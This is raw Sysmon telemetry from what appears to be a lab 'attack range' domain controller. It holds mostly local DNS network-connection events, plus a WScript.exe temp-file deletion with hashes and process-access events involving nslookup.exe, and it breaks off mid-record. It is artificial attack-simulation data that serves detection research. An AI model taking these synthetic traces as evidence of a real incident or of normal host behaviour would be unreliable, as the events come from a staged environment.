354300x8000000000000000217862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.156{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51519- 354300x8000000000000000217861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.156{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51519- 354300x8000000000000000217860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.156{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51518- 354300x8000000000000000217859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.156{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51518- 354300x8000000000000000217858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.332{00000000-0000-0000-0000-000000000000}3832<unknown process>-udptruefalse127.0.0.1-51495-false127.0.0.1-53domain 354300x8000000000000000217857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.082{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51517- 354300x8000000000000000217856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.082{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51517- 354300x8000000000000000217855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.082{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51516- 354300x8000000000000000217854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.082{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51516- 354300x8000000000000000217853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.081{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51515- 354300x8000000000000000217852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.081{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51515- 354300x8000000000000000217851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.081{00000000-0000-0000-0000-000000000000}7768<unknown process>-udptruefalse127.0.0.1-51515-false127.0.0.1-53domain 354300x8000000000000000217850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.980{00000000-0000-0000-0000-000000000000}7488<unknown process>-udpfalsefalse127.0.0.1-51514-false127.0.0.1-53domain 354300x8000000000000000217849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.980{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51514- 354300x8000000000000000217848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.980{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51514- 354300x8000000000000000217847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.980{00000000-0000-0000-0000-000000000000}7488<unknown process>-udptruefalse127.0.0.1-51514-false127.0.0.1-53domain 354300x8000000000000000217846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.881{00000000-0000-0000-0000-000000000000}2512<unknown process>-udpfalsefalse127.0.0.1-51513-false127.0.0.1-53domain 354300x8000000000000000217845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.881{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51513- 354300x8000000000000000217844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.881{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51513- 354300x8000000000000000217843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.881{00000000-0000-0000-0000-000000000000}2512<unknown process>-udptruefalse127.0.0.1-51513-false127.0.0.1-53domain 354300x8000000000000000217842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.881{00000000-0000-0000-0000-000000000000}2512<unknown process>-udpfalsefalse127.0.0.1-51512-false127.0.0.1-53domain 354300x8000000000000000217841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.881{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51512- 354300x8000000000000000217840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.881{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51512- 354300x8000000000000000217839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.881{00000000-0000-0000-0000-000000000000}2512<unknown process>-udptruefalse127.0.0.1-51512-false127.0.0.1-53domain 354300x8000000000000000217838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.880{00000000-0000-0000-0000-000000000000}2512<unknown process>-udpfalsefalse127.0.0.1-51511-false127.0.0.1-53domain 354300x8000000000000000217837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.880{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51511- 354300x8000000000000000217836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.880{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51511- 354300x8000000000000000217835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.880{00000000-0000-0000-0000-000000000000}2512<unknown process>-udptruefalse127.0.0.1-51511-false127.0.0.1-53domain 354300x8000000000000000217834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.788{00000000-0000-0000-0000-000000000000}5776<unknown process>-udpfalsefalse127.0.0.1-51510-false127.0.0.1-53domain 354300x8000000000000000217833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.788{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51510- 354300x8000000000000000217832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.788{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51510- 354300x8000000000000000217831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.788{00000000-0000-0000-0000-000000000000}5776<unknown process>-udptruefalse127.0.0.1-51510-false127.0.0.1-53domain 354300x8000000000000000217830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.788{00000000-0000-0000-0000-000000000000}5776<unknown process>-udpfalsefalse127.0.0.1-51509-false127.0.0.1-53domain 354300x8000000000000000217829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.788{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51509- 354300x8000000000000000217828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.788{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51509- 354300x8000000000000000217827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.788{00000000-0000-0000-0000-000000000000}5776<unknown process>-udptruefalse127.0.0.1-51509-false127.0.0.1-53domain 354300x8000000000000000217826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.787{00000000-0000-0000-0000-000000000000}5776<unknown process>-udpfalsefalse127.0.0.1-51508-false127.0.0.1-53domain 354300x8000000000000000217825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.787{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51508- 354300x8000000000000000217824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.787{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51508- 354300x8000000000000000217823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.787{00000000-0000-0000-0000-000000000000}5776<unknown process>-udptruefalse127.0.0.1-51508-false127.0.0.1-53domain 354300x8000000000000000217822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.684{00000000-0000-0000-0000-000000000000}4176<unknown process>-udpfalsefalse127.0.0.1-51507-false127.0.0.1-53domain 354300x8000000000000000217821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.684{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51507- 354300x8000000000000000217820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.684{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51507- 354300x8000000000000000217819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.684{00000000-0000-0000-0000-000000000000}4176<unknown process>-udptruefalse127.0.0.1-51507-false127.0.0.1-53domain 354300x8000000000000000217818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.684{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51506- 354300x8000000000000000217817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.684{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51506- 354300x8000000000000000217816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.684{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51505- 354300x8000000000000000217815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.683{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51505- 354300x8000000000000000217814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.572{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51504- 354300x8000000000000000217813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.572{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51504- 354300x8000000000000000217812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.572{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51503- 354300x8000000000000000217811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.571{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51503- 354300x8000000000000000217810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.571{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51502- 354300x8000000000000000217809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.571{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51502- 354300x8000000000000000217808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.483{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51501- 354300x8000000000000000217807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.483{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51501- 354300x8000000000000000217806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.483{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51500- 354300x8000000000000000217805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.483{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51500- 354300x8000000000000000217804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.482{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51499- 354300x8000000000000000217803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.482{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51499- 354300x8000000000000000217802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.407{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51498- 354300x8000000000000000217801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.407{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51498- 354300x8000000000000000217800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.335{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51497- 354300x8000000000000000217799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.335{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51497- 354300x8000000000000000217798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.334{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51496- 354300x8000000000000000217797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.334{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51496- 354300x8000000000000000217796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.334{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51495- 354300x8000000000000000217795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.250{00000000-0000-0000-0000-000000000000}5380<unknown process>-udpfalsefalse127.0.0.1-51494-false127.0.0.1-53domain 354300x8000000000000000217794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.250{00000000-0000-0000-0000-000000000000}5380<unknown process>-udptruefalse127.0.0.1-51494-false127.0.0.1-53domain 354300x8000000000000000217793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.250{00000000-0000-0000-0000-000000000000}5380<unknown process>-udpfalsefalse127.0.0.1-51493-false127.0.0.1-53domain 354300x8000000000000000217792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.250{00000000-0000-0000-0000-000000000000}5380<unknown process>-udptruefalse127.0.0.1-51493-false127.0.0.1-53domain 354300x8000000000000000217791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.250{00000000-0000-0000-0000-000000000000}5380<unknown process>-udpfalsefalse127.0.0.1-51492-false127.0.0.1-53domain 354300x8000000000000000217790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.250{00000000-0000-0000-0000-000000000000}5380<unknown process>-udptruefalse127.0.0.1-51492-false127.0.0.1-53domain 354300x8000000000000000217789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.180{00000000-0000-0000-0000-000000000000}7868<unknown process>-udpfalsefalse127.0.0.1-51491-false127.0.0.1-53domain 354300x8000000000000000217788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.180{00000000-0000-0000-0000-000000000000}7868<unknown process>-udptruefalse127.0.0.1-51491-false127.0.0.1-53domain 354300x8000000000000000217787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.180{00000000-0000-0000-0000-000000000000}7868<unknown process>-udpfalsefalse127.0.0.1-51490-false127.0.0.1-53domain 354300x8000000000000000217786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.180{00000000-0000-0000-0000-000000000000}7868<unknown process>-udptruefalse127.0.0.1-51490-false127.0.0.1-53domain 354300x8000000000000000217785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.180{00000000-0000-0000-0000-000000000000}7868<unknown process>-udpfalsefalse127.0.0.1-51489-false127.0.0.1-53domain 354300x8000000000000000217784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.179{00000000-0000-0000-0000-000000000000}7868<unknown process>-udptruefalse127.0.0.1-51489-false127.0.0.1-53domain 354300x8000000000000000217783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.105{00000000-0000-0000-0000-000000000000}3596<unknown process>-udpfalsefalse127.0.0.1-51488-false127.0.0.1-53domain 354300x8000000000000000217782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.105{00000000-0000-0000-0000-000000000000}3596<unknown process>-udptruefalse127.0.0.1-51488-false127.0.0.1-53domain 354300x8000000000000000217781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.104{00000000-0000-0000-0000-000000000000}3596<unknown process>-udpfalsefalse127.0.0.1-51487-false127.0.0.1-53domain 354300x8000000000000000217780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.104{00000000-0000-0000-0000-000000000000}3596<unknown process>-udptruefalse127.0.0.1-51487-false127.0.0.1-53domain 354300x8000000000000000217779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.104{00000000-0000-0000-0000-000000000000}3596<unknown process>-udpfalsefalse127.0.0.1-51486-false127.0.0.1-53domain 23542300x8000000000000000217778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.259{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfpyp.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.243{2E1864BB-1906-629A-2D47-000000005F02}33967456C:\Windows\system32\conhost.exe{2E1864BB-1906-629A-2E47-000000005F02}3140C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.243{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.243{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.243{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 